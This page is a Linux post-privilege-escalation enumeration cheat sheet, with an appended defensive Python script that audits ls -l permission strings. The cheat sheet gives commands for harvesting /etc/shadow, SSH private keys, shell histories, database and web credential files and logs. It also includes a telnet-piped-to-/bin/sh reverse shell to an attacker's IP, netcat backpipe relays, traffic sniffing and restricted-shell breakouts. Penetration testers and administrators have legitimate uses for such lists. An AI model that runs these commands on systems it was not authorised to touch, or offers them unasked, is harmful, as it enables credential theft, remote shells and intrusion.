awk linux get port number_Commands for gathering sensitive information after Linux privilege escalation
If a command cannot be executed, the host is probably a different type of Linux.
What is the distribution type and version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
What is the kernel version?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz
What are the environment variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
What services are running? Which user (and privilege level) is each running as?
ps aux
ps -ef
top
cat /etc/services
Which services are running as root?
ps aux | grep root
ps -ef | grep root
What applications are installed? What versions are they?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
Service settings: are there any misconfigurations? Are any vulnerable plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.cnf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.*r.*/'
What jobs are scheduled on the host?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
What plaintext usernames and passwords might there be on the host?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # Joomla (single quotes so the shell does not expand $password)
What NIC(s) does the system have? Which network is it connected to?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What kind of servers are on the network?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users/hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
Cached IP and/or MAC addresses?
arp -e
route
/sbin/route -nee
Is packet sniffing possible? Listen to the traffic
# tcpdump 'tcp and dst host [ip] and dst port [port]'
tcpdump 'tcp and dst host 192.168.1.7 and dst port 80 or tcp and dst host 10.2.2.222 and dst port 21'
How do you get a shell? How do you interact with the system?
nc -lvp 4444    # Attacker: input (commands)
nc -lvp 4445    # Attacker: output (results)
telnet [attackers ip] 4444 | /bin/sh | telnet [attackers ip] 4445    # On the target system. Use the attacker's IP!
How to port forward? (port redirection)
# fpipe (Windows)
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local port forward
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote port forward
# mknod
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] > backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 > backpipe    # Port relay
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe &    # Proxy monitor (port 80 to 8080), run in the background
Sending commands locally/remotely (tunnelling)
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
Who are you? Which id are you logged in as? Who has been logged in? Who else is here? Who can do what?
id
who
w
last
cut -d: -f1 /etc/passwd    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything interesting in the home directory(s)? If it is possible to access them
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user been doing? Are there any passwords? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
Which configuration files in /etc/ can be written to? Is it possible to reconfigure a service?
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.*w.*/'     # Anyone
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^..w/'       # Owner
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.....w/'    # Group
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/'        # Other
find /etc/ -readable -type f 2>/dev/null                 # Anyone
find /etc/ -maxdepth 1 -readable -type f 2>/dev/null     # Anyone
What can be found in /var/?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any hidden settings/files on the website? Any settings files with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
What is in the log files? (Could anything there help a "local file inclusion"?)
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
If commands are restricted, how do you break out of the restricted shell?
python -c 'import pty;pty.spawn("/bin/bash")'
os.system('/bin/bash')    # typed inside an interactive Python session, after "import os"
/bin/sh -i
How are file systems mounted?
mount
df -h
Are there any mounted file systems?
cat /etc/fstab
What "advanced Linux file permissions" are in use? Sticky bits, SUID and SGID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)
# Find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
Where can you write and execute? A few "common" directories: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # folders writable by the current user
find / -perm -222 -type d 2>/dev/null      # world-writable folders
find / -perm -o+w -type d 2>/dev/null    # world-writable folders
find / -perm -o+x -type d 2>/dev/null    # world-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writable & executable folders
Any "problem" files? World-writable files and files with no owner
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print   # files with no owner or group
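The awk filters on /etc/ above and the SUID/SGID/sticky-bit and world-writable checks all come down to reading the mode column of `ls -l`. The following Python example is added here and is not part of the original cheat sheet: it decodes that mode string (including the `s`/`S` and `t`/`T` set-id and sticky letters) and walks constructed `ls -l` lines to report world-writable paths (skipping sticky directories such as /tmp, which are expected) and set-id files, which is what an administrator audits to catch the misconfigurations these commands look for.

```python
import re

# Mode column of `ls -l`: type char + three rwx triples, optional '+'/'.'/'@' (ACL/SELinux/xattr marker).
MODE_RE = re.compile(r'^([-dlcbps])([-r][-w][-xsS])([-r][-w][-xsS])([-r][-w][-xtT])[+.@]?$')

def parse_mode(mode):
    """Decode an ls -l mode string into the facts the page's awk filters look for."""
    m = MODE_RE.match(mode)
    if not m:
        raise ValueError("not an ls -l mode string: %r" % mode)
    ftype, owner, group, other = m.groups()
    return {
        "is_dir": ftype == "d",
        "is_symlink": ftype == "l",
        "owner_write": owner[1] == "w",   # what awk '$1 ~ /^..w/' matches
        "group_write": group[1] == "w",   # what awk '$1 ~ /^.....w/' matches
        "other_write": other[1] == "w",   # what awk '$1 ~ /w.$/' matches
        "suid": owner[2] in "sS",          # 's' = set-id + exec, 'S' = set-id without exec
        "sgid": group[2] in "sS",
        "sticky": other[2] in "tT",
    }

def audit_listing(lines):
    """Report world-writable paths (except sticky dirs) and set-id files from `ls -l` lines."""
    findings = []
    for line in lines:
        fields = line.split(None, 8)
        if len(fields) < 9 or not MODE_RE.match(fields[0]):
            continue  # skip 'total N', blank lines and the 'dir:' labels of ls -R
        p, name = parse_mode(fields[0]), fields[8]
        if p["is_symlink"]:
            continue  # a symlink's own mode says nothing; audit the target instead
        if p["other_write"] and not (p["is_dir"] and p["sticky"]):
            findings.append("world-writable: " + name)
        if (p["suid"] or p["sgid"]) and not p["is_dir"]:
            findings.append("set-id: " + name)
    return findings

# Constructed sample lines in `ls -l` format (not captured from a real host).
SAMPLE = [
    "total 12",
    "-rw-rw-rw- 1 root root  220 Jan  1 10:00 /etc/app.conf",
    "-rwsr-xr-x 1 root root 1234 Jan  1 10:00 /usr/bin/passwd",
    "drwxrwxrwt 2 root root 4096 Jan  1 10:00 /tmp",
    "drwxrwxrwx 2 root root 4096 Jan  1 10:00 /var/tmp/shared",
    "lrwxrwxrwx 1 root root    7 Jan  1 10:00 /etc/link -> target",
]

if __name__ == "__main__":
    print("\n".join(audit_listing(SAMPLE)))
```

Pipe real output in with `ls -aRl /etc/ 2>/dev/null | python3 audit.py` after replacing SAMPLE with `sys.stdin`; `ls -l` output differs slightly between distributions, so the regex accepts the trailing ACL/SELinux marker but not every locale's date format.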
Preparation and finding exploit code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp